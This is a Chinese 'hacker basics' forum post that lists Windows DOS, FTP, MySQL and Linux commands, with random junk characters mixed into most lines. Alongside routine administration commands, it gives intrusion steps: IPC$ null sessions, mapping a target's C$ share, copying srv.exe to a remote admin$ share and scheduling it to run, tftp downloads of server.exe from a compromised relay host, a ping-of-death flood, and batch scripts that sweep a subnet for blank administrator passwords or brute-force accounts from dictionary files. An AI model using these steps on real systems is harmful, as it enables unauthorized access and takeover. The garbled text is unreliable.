黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 * l/ M$ f$ j5 t- s  i- e7 F7 T
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
' b% B- j* x( B# n' J8 Fnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: " T& X( ~/ c8 L9 b" S+ p' R& D, U
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
' \( F7 G$ U: M  p+ }net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
/ p- T6 B) Y# bnet use h: /del 删除映射对方到本地的为H:的映射   u" m  E6 u7 s9 [, ^8 q
net user 用户名　密码　/add 建立用户
; c% s& |1 }9 u) D5 X8 g: lnet user guest /active:yes 激活guest用户 : a& y2 J" o5 L& M; Y
net user 查看有哪些用户
2 z' u9 a' C2 s0 W' a3 Vnet user 帐户名 查看帐户的属性
/ l3 N6 e% i! Cnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 " m$ ^3 H/ n2 @  ]5 O- u
net start 查看开启了哪些服务 + B, `8 ?7 Q4 P4 R2 s0 a& Y7 o6 N
net start 服务名　 开启服务；(如:net start telnet， net start schedule) & Y: }, U9 o8 x% x  S+ H
net stop 服务名 停止某服务
! j" W" O+ ?: d! onet time \\目标ip 查看对方时间 7 H0 c0 {( j7 a/ c* k& s3 a* c
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
6 m6 c. X8 w; J0 ^" T* Enet view 查看本地局域网内开启了哪些共享 % Z! C3 C+ f0 A" y" K/ o; _/ a
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
; G3 s7 D  G% Z9 Y# knet config 显示系统网络设置
' x* f, T$ c6 h4 n, j* T" onet logoff 断开连接的共享 : R: w  m; {2 J# ~
net pause 服务名 暂停某服务 / ^; D6 U( c  f8 d1 y2 i1 m/ s4 m# v- }
net send ip "文本信息" 向对方发信息
9 w" F& U& d0 F0 tnet ver 局域网内正在使用的网络连接类型和信息 , c( t: R7 v6 {- Q8 K4 d
net share 查看本地开启的共享
8 R* U8 }0 A2 D+ Y! }6 fnet share ipc$ 开启ipc$共享 0 W; W' V3 f# A% l$ l, y* n
net share ipc$ /del 删除ipc$共享 : r' ?) ^. S- u4 b' Y
net share c$ /del 删除C：共享 2 K$ ]$ G3 V% W
net user guest 12345 用guest用户登陆后用将密码改为12345 & U! w4 t/ W& r" S' T- Z7 r
net password 密码 更改系统登陆密码 5 Y7 u; G& C7 C( G; V
netstat -a 查看开启了哪些端口,常用netstat -an
: Z& H4 N' [! p% mnetstat -n 查看端口的网络连接情况，常用netstat -an 1 @5 `- h2 g; p) T, d6 [5 O
netstat -v 查看正在进行的工作
7 y/ i: t8 \- ~- o* Cnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
/ x# n) K2 q0 S1 p: Onetstat -s 查看正在使用的所有协议使用情况 4 {2 ?/ w  m! B
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
' s. N$ {! h" Mtracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 : S: q" @0 W) c) v* D/ Q" S
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 5 j* H. u# T+ R  q0 M& E
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) $ h2 k$ V: X) u. e, I7 T/ C5 S
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 . ?# I2 D9 L2 S3 z: M! \! h
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 4 n# j  W5 h8 C; G* p
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
: q( h" z7 D! K* T3 sdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 - A% A) N+ r- q; d/ B8 R
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
8 H+ o  P  q+ |* S& e8 Gmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 " }. e7 }. {0 b, T
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
* Q2 d. i' ~2 T5 {3 aat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
0 t' d5 r' V; M) D' sat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
. J7 y! M( J/ d& x( Aat id号 /delete 停止某个已注册的计划任务 3 s9 {( t: g0 g* g8 V, R5 O6 k" n
at 查看所有的计划任务 ) X( D1 P- j2 f% t
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
/ b2 K6 ~' \# y' H) Lfinger username @host 查看最近有哪些用户登陆
6 Y! J0 f& B. m* p" x* X, ~; Itelnet ip 端口 远和登陆服务器,默认端口为23
0 |9 s3 }& {4 d; o$ s9 F* f  k2 popen ip 连接到IP（属telnet登陆后的命令） ; A* p2 A3 h4 X3 s1 Q
telnet 在本机上直接键入telnet 将进入本机的telnet ) v9 s9 ?5 a: {6 |6 x% \" @$ h" f
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
) Z8 O8 R7 [! i/ k  Bcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下   b$ e" C9 B$ [4 m4 t
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 # n4 u& t3 B# ]% o* }+ U4 v9 n
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： % v6 n9 A9 A8 B1 {. v3 P2 k
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 - V! x# e0 L, S
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
" S. n' ?! V6 j: ltftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 7 p( n6 c2 \" A% ^8 E  N0 m
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
7 o% E; R2 l7 V  I4 S3 Groute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
. i% _& d: h9 }- l- J$ Narp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 4 R* j% g5 Q/ a7 S3 I' o6 I7 y
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
, I9 G0 N4 C3 {2 ~: D3 r! ~mem 查看cpu使用情况
7 M8 n( b# {: f: m$ wattrib 文件名(目录名) 查看某文件（目录）的属性 4 V& t4 n6 Y$ N- K+ R4 m3 S
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性   P4 O1 i2 w8 P5 J. ~% ]! b$ s
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 : @; F# ]: s  g
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
$ S5 E9 j3 f7 u+ Hset 指定环境变量名称=要指派给变量的字符 设置环境变量
% i2 t8 P9 w, M0 m0 Uset 显示当前所有的环境变量 4 l, U) Y( w5 u
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
. Y/ k+ m) _: ?- d9 S8 l) Npause 暂停批处理程序，并显示出：请按任意键继续....
$ {2 z4 {9 }4 K4 pif 在批处理程序中执行条件处理（更多说明见if命令及变量）
1 ?8 R" e; W% T% v4 p3 Igoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
( q& F# E5 F2 u6 {call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） 4 N6 ?* j/ D2 q
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
1 J5 H5 \# k1 d4 i0 K( c0 D- }echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
  H/ B* G: s8 m/ g3 E. iecho 信息 在屏幕上显示出信息 / v' Z- M  ?- r5 |; }4 {+ r' |  `- v( E; w
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 / R- s- Z. d9 U
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
0 @. e$ F& |! J' L- ?$ u, C9 [find 文件名 查找某文件
5 r& W9 w! V7 T6 l* Y8 Y" U/ Htitle 标题名字 更改CMD窗口标题名字 7 L/ I$ @& u& M8 }, p1 E+ @+ p
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
) {8 b$ G  ~7 r6 `; R5 H) [: dprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
: X" Y8 c  b5 O1 p5 jprint 文件名 打印文本文件 6 W0 K" P# Q1 q7 j. u
ver 在DOS窗口下显示版本信息 ! Y6 \" Y6 }( B9 G/ S9 B+ j  G
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
  {  ~1 k8 ?& E9 Y- n) Mformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
( s7 a5 v- z4 Y% i3 X) fmd　目录名 创建目录
1 N6 @' x) ]2 x! \; u! V- W3 O) sreplace 源文件　要替换文件的目录 替换文件
0 Q3 c6 G& W6 z+ \ren 原文件名　新文件名 重命名文件名 . |2 J: p7 _, I7 D- ?: n% U
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
: x3 a, D2 r. Q7 m- Ntype 文件名 显示文本文件的内容
+ ?% h) I# O3 S7 |# F& Cmore 文件名 逐屏显示输出文件 + H8 |9 i7 e0 q8 k7 l2 l
doskey 要锁定的命令＝字符: T7 W* o5 Y& @) {; Y6 j- A7 w/ B
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= 0 ?8 p; C2 ?1 q4 ]
taskmgr 调出任务管理器
" x! F* j4 W2 @chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
/ U1 B2 g8 L. }. ^  r- vtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
7 |* w  k% ]2 {0 Eexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe 3 s3 d5 }9 r8 `. h
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
0 R) V6 z" d4 t; i. d- Z0 @# Ncmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
* [+ x! o' `: f; Q5 ?regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； $ O: N6 Z+ ~( [! f  d% e
regedit /e 注册表文件名 导出注册表 8 o/ W* l! _* i3 Z1 T  l! q* ~" T
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
# s+ H" Z. N0 I- g' tcacls 文件名 查看文件的访问用户权限列表
4 y  d" A9 C, M7 t7 xREM 文本内容 在批处理文件中添加注解 . g# X7 t- l! U. c
netsh 查看或更改本地网络配置情况
& ~1 F1 T4 J6 k- b& c# XIIS服务命令：- l+ _, ~. w0 a+ w3 y
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） & [( c/ b. u) }1 [. Y9 N& k- s0 {
iisreset /start或stop 启动（停止）所有Internet服务 # o3 [1 G( A. ^/ J* \
iisreset /restart 停止然后重新启动所有Internet服务
1 I! B1 B- Y+ q* i/ Q4 b& giisreset /status 显示所有Internet服务状态 . z. d" q! T- T6 x
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
5 [/ A1 f# O0 Z( r# Biisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 3 t7 f+ A; ], h" W* G4 ]
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
6 G4 e& C* b7 f1 oiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 / b) K: j% v! D
FTP 命令： (后面有详细说明内容) 1 b2 o7 T2 Q% P( ~  n, [) ?' F) k) t
ftp的命令行格式为:
7 [% h* A5 \( c6 sftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。. s, x0 F' b5 E: q
－d 使用调试方式。 2 b' w5 s' s( U- ?
－n 限制ftp的自动登录,即不使用.netrc文件。
! U. G9 t6 g% c! O－g 取消全局文件名。
( z& V, A& k6 y6 l/ ], Vhelp [命令] 或 ？[命令] 查看命令说明 1 o1 g- f& F" r3 T4 C* P
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
5 n: j6 r8 V( K. b0 ~( a7 Npwd 列出当前远端主机目录 & W0 R% q6 b# |
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 ; o' O- ?+ e. U3 n
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
1 y/ M- {" M8 pmget [remote-files] 从远端主机接收一批文件至本地主机
9 e! U4 y' S3 c" pmput local-files 将本地主机中一批文件传送至远端主机 : d' R7 G' E# W. l
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
% s6 t) X; x, z% \- e' ]ascii 设定以ASCII方式传送文件(缺省值) & a9 N* s) ~1 m
bin 或 image 设定以二进制方式传送文件
+ m- m# c; ~; @5 gbell 每完成一次文件传送,报警提示
' _- a! `& y& g/ d$ \  F8 Tcdup 返回上一级目录 0 B0 }+ {* o8 G/ m
close 中断与远程服务器的ftp会话(与open对应)
9 |, C, v. e1 x, ]& i2 kopen host[port] 建立指定ftp服务器连接,可指定连接端口
" e3 Y' O( Q4 n5 S# q" d/ S  j  pdelete 删除远端主机中的文件 ! g& F0 D! v# i' V
mdelete [remote-files] 删除一批文件 ( V2 T' B7 m1 p* @: W
mkdir directory-name 在远端主机中建立目录
( {6 z% b' [. F' ~rename [from] [to] 改变远端主机中的文件名
, H, r; f4 t( [1 t8 Frmdir directory-name 删除远端主机中的目录
! C# u- ^, L) D5 z$ r2 jstatus 显示当前FTP的状态 ' D) J. c) E# {# q. q
system 显示远端主机系统类型 : Q9 v* S" Q! ?6 x& T8 I& p5 X
user user-name [password] [account] 重新以别的用户名登录远端主机
# r7 D( n3 g( ~open host [port] 重新建立一个新的连接 , R) [3 u7 e( }" Z' Y! g4 d
prompt 交互提示模式
- ?5 V3 \% ?8 _6 G3 P9 M* Q( Fmacdef 定义宏命令 6 U. i* c4 i; K& J5 `
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
/ O- p% J8 R& Z: r& n( x1 A2 B/ Cchmod 改变远端主机的文件权限 ( H# x9 o. ~) l' ^, F' @+ [1 A
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
- Q% G  {5 _: [1 L. C% ^! [2 m  fcd remote－dir 进入远程主机目录
* V# [* x, a3 _$ d0 Acdup 进入远程主机目录的父目录 ' T3 L+ ^* r  z' O# q2 m9 p
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
6 Z9 ~" r/ y% Z: y0 b7 oMYSQL 命令： ( I  H" d7 {: e$ r7 n+ ~, {
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。0 L6 L) B- v4 X
（例：mysql -h110.110.110.110 -Uroot -P123456
% G4 h; J) D/ U8 R注:u与root可以不用加空格，其它也一样） + V) ~- f2 f  O3 y" _
exit 退出MYSQL
( \. N( o% l, W3 l2 C* wmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 - B' t+ y0 _& {1 b; g& _
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
0 Z! }( o: d- O/ H2 C  y" sshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 ( i% I3 Y4 U- N
use mysql；9 l# Q% h- H/ K# _6 R" g+ y
show tables; 显示库中的数据表 + ~! Y) n5 U$ T: v; w
describe 表名; 显示数据表的结构 7 f( [3 ~3 k* `+ o6 L9 a! t& N) H
create database 库名; 建库 & `  u- `% D6 j$ `- n' p: ?1 \% R
use 库名；
; d+ P% D' ?9 T$ Fcreate table 表名 (字段设定列表)； 建表 8 @+ W+ z% {( k# r# L
drop database 库名;
, o$ g2 `4 p, jdrop table 表名； 删库和删表
2 T6 h  j( F' Fdelete from 表名; 将表中记录清空
, D$ ^  p3 Y4 F" @9 e7 z9 t& z& dselect * from 表名; 显示表中的记录
# w5 F. n/ D- d# fmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 7 r2 W0 p8 M+ V* k$ K
win2003系统下新增命令（实用部份）：
$ B6 _+ f5 h4 x) _* M0 Fshutdown /参数 关闭或重启本地或远程主机。
. p- F# Z: L8 j" B, D! W参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。6 s0 r* ^4 e* Z# Y  _* H" |
例：shutdown /r /t 0 立即重启本地主机（无延时）
3 {, n( P$ Y" q  ~- t  b& itaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。6 G# v# n, W1 R) \& g
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
, o4 Y0 B! T) G( n7 etasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。3 ~& w8 E7 O. E
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
( F5 O& S; a) H! F$ J2 cLinux系统下基本命令： 要区分大小写0 d6 N6 X* ^) j. A+ ^- y4 K6 i; B
uname 显示版本信息（同win2K的 ver） 4 Y( ^$ }' P8 \
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） $ [0 D+ d7 Z" c) B
pwd 查询当前所在的目录位置
4 ]' r. z, o7 U' q5 n7 wcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
1 L5 n3 ]" Z: d# bcat 文件名 查看文件内容
7 r3 k' X- ?, Y: v; ~! A  H  Tcat >abc.txt 往abc.txt文件中写上内容。 , Y3 H% Y% P, L0 l8 r
more 文件名 以一页一页的方式显示一个文本文件。
5 S2 P( g2 T; m% g+ H5 ?- A' B; scp 复制文件
# {# B( ~& ]# zmv 移动文件
/ C8 G+ j$ |6 `& L" h$ [rm 文件名 删除文件，rm -a 目录名删除目录及子目录
; i+ l3 `( p8 f  lmkdir 目录名 建立目录   k9 `* ~5 L2 P$ u
rmdir 删除子目录，目录内没有文档。 * J- g$ Y, @4 v! _8 f1 Z5 |( `) Z5 V
chmod 设定档案或目录的存取权限 % i# D, v% m8 e1 i1 N
grep 在档案中查找字符串 ( \5 {. r  \$ F$ _7 n+ j, }
diff 档案文件比较 3 s% V3 s8 B4 c8 _! S: q8 m
find 档案搜寻
( G) o* s) @! ~  Edate 现在的日期、时间
2 [0 c: v! R6 t: f/ D& qwho 查询目前和你使用同一台机器的人以及Login时间地点   ?' U( \# j4 \! ^4 E
w 查询目前上机者的详细资料 % k4 O& Q3 n. i0 S# M  X
whoami 查看自己的帐号名称 6 g0 \: L3 R9 E/ M* \
groups 查看某人的Group
% h8 b- R4 z7 S# x8 P/ q4 ~% Opasswd 更改密码
1 t- A9 l# v, L$ }- m8 V8 bhistory 查看自己下过的命令 6 ~2 B6 b) L: ]
ps 显示进程状态 : F1 D$ S5 L: e7 A" U' B
kill 停止某进程 3 T% n5 @# u0 n8 l
gcc 黑客通常用它来编译C语言写的文件 $ F$ L* t5 E* I; a+ x
su 权限转换为指定使用者
* |5 t, E* r6 G1 M4 f+ Ntelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 , _' Y7 y8 J& [8 K
ftp ftp连接上某服务器（同win2K8 _  N# ^6 D7 s  K0 G
附：批处理命令与变量, R! b( Z& G/ ]
1：for命令及变量 基本格式： : A# x" p: H, I) q1 ^
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
/ H3 A2 Z1 S) b, P$ ]; [批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3) f9 o$ P* A! K2 s' l: [/ D1 x
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}* G1 F$ J8 ~0 o) I- f
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
) L* x/ x( I# x  H* J0 [: Rcommand_parameters：为特定命令指定参数或命令行开关" B6 a3 i; S( D5 |! ^+ j
IN (set)：指在(set)中取值；DO command ：指执行command
' c* e* P  C; `8 Y( g$ s8 r! [% `参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 1 ^% G" M; c1 c5 t: t
用法举例： 6 h" w$ o# M% ?+ q; F% l( {
@echo off + f! Q4 \* C# b# }( U' y& X: X
echo 用法格式：test.bat *.*.* > test.txt
8 k- X: I9 B1 W  X3 u6 v& Xfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
  ~6 f0 v6 D& S1 t) x7 g存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。! [0 T7 {+ b" H; w" p1 F8 H
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
/ @( w& c0 `; [5 @@echo off
" w) C1 d! h4 F+ Gecho 用法格式：ok.bat ip ( y5 w/ S+ w- [' B
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 ' }, Q$ {' i9 A7 {9 r/ q1 V
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。. v& U# h2 m0 L1 J# ^) }
2：if命令及变量 基本格式： 0 M$ u" T5 s+ n2 I6 I  r: R
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。0 f7 ^8 [( \2 |3 w6 D8 A8 }
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
4 ]3 _2 b3 I0 n; i; r' h0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
; c3 G5 m" i' k% F4 j" c& F+ q$ f4 lIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
$ j1 s1 R* \6 l- `$ p例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） * k5 Y5 i( p( G/ \2 N
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。6 R5 [& a3 s, q: R
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
8 ^9 M/ t& v; r4 Y; D/ \4 b) HIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”